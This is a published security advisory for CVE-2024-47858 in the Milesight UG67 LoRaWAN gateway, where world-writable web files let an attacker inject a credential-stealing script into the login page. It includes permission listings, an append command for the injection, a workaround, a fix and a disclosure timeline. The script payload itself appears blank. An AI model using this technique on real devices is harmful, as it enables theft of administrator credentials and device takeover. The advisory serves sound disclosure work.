Advisory: Milesight UG67: World Writeable Webroot Allows for Privilege Escalation Attackers with any user account on a Milesight UG67 LoRaWAN Gateway can gain full root access by manipulation of the webroot. ### Details - Product: Milesight UG67 Outdoor LoRaWAN Gateway - Affected Versions: 60.0.0.42-r5, likely others - Fixed Versions: 60.0.0.44 - Vulnerability Type: Local Privilege Escalation - Security Risk: low - Vendor URL: https://www.milesight.com/iot/product/lorawan-gateway/ug67 - Vendor Status: fixed version released - Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-005 - Advisory Status: published - CVE: CVE-2024-47858 - CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47858 ### Introduction The Milesight UG67 is a robust outdoor LoRaWAN® gateway designed for outdoor deployments. ### More Details Attackers with access to any user account on a Milesight UG67 LoRaWAN Gateway can modify the source files of the web interface, which makes it possible to send all credentials entered via the web interface, including those of administrative accounts, to an attacker-controlled system. ### Proof of Concept Any user account with the ability to perform arbitrary commands on the gateway (see for example [rt-sa-2024-003](https://www.redteam-pentesting.de/advisories/rt-sa-2024-003) on how to gain command execution via PostgreSQL) has read and write access to the webroot (located at `/www/`) of the web interface, since the corresponding source files are world-modifiable: ``` root@GATEWAY:/www# ps | grep uhttpd 3450 root 13892 S /sbin/uhttpd -f -w 1800 -h /www -r GATEWAY -x /cgi-bin -u /cgi -t 1800 -T 30 -k 20 -A 1 -n 3 -N 100 -D -R -p 127.0.0.1:17080 -p [::1]:17080 -C /etc/https.crt -K /etc/https.key -s 127.0.0.1:17443 -s [::1]:17443 root@GATEWAY:/www# ls -la drwxr-xr-x 1 root root 4096 May 7 23:36 . drwxr-xr-x 1 root root 4096 Apr 29 22:42 .. drwxr-xr-x 1 root root 4096 May 7 23:21 cgi-bin drwxrwxrwx 2 root root 374 Feb 19 20:37 css drwxrwxrwx 3 root root 26 Feb 19 20:37 dist -rw-rw-rw- 1 root root 1107 Feb 19 09:15 example.html drwxrwxrwx 2 root root 1073 Feb 19 20:37 images -rw-rw-rw- 1 root root 854674 Feb 19 09:15 index.html -rw-rw-rw- 1 root root 8164 Feb 19 09:15 index_mobile.html drwxrwxrwx 2 root root 743 Feb 19 20:37 js drwxrwxrwx 2 root root 157 Feb 19 20:37 lang drwxr-xr-x 1 root root 4096 May 7 21:45 log -rw-rw-rw- 1 root root 272918 May 7 23:53 login.html -rw-rw-rw- 1 root root 1719 Feb 19 09:15 login_mobile.html drwxrwxrwx 11 root root 197 Feb 19 20:37 view ``` This enables attackers to modify the login page, for example by adding a script component that sends credentials to an attacker-controlled system. The following example was used as proof of concept: ``` ``` The following command edits the login page in-place and adds the script above. While this appends the script after the closing `` tag, common browsers will still execute it: ``` echo '' >> /www/login.html ``` As a consequence, all credentials entered into the web interface after compromise, including those of administrative accounts, can be collected by attackers. ### Workaround Manually change the file permissions of the HTML source files of the web interface to remove write-access for all users. ### Fix The default file permissions for the HTML source files of the web interface should be fixed to restrict access to only those accounts that actually require access. ### Security Risk Attackers who are able to execute arbitrary commands on a Milesight UG67 LoRaWAN Gateway, can collect valid user credentials by modifying the webroot of the web interface. If login details of an administrative user can be obtained, this allows attackers to completely take over the device, and extract all configured secrets. Since all accounts, except the root account, only have a limited shell configured, which does not allow to execute arbitrary commands, this attack requires another vulnerability (like [rt-sa-2024-003](https://www.redteam-pentesting.de/advisories/rt-sa-2024-003)) to gain shell access. The attack furthermore requires user interaction, since an administrative user has to authenticate to the web interface, or perform an equivalent action that results in observable ubus traffic, while the device is compromised. In combination these vulnerabilities pose a medium risk. ### Timeline - 2024-04-25 Vulnerability identified - 2024-04-29 Customer approved disclosure to vendor - 2024-05-14 Vendor notified - 2024-06-28 asked Vendor for update - 2024-07-03 Vendor will provide Update until end of July - 2024-07-24 asked Vendor for update - 2024-07-30 Vendor stated: Work in Progress - 2024-08-09 Vendor stated: Fix expected Q3/24 - 2024-09-24 CVE ID requested - 2024-09-24 asked Vendor for update - 2024-09-24 Vendor stated: Fix in 60.0.0.44 - 2024-10-04 CVE ID assigned - 2024-10-07 asked Vendor for update - 2024-10-08 Vendor stated: Fix will be available mid-October - 2024-10-18 asked Vendor for update - 2024-10-21 Vendor stated: Fix will be available mid-November - 2024-11-04 Vendor released fixed version for testing - 2024-11-05 Vendor released fixed version - 2024-12-10 Customer approved public release of vulnerabiltiy details - 2024-12-10 Advisory released ### RedTeam Pentesting GmbH RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: ### Working at RedTeam Pentesting RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: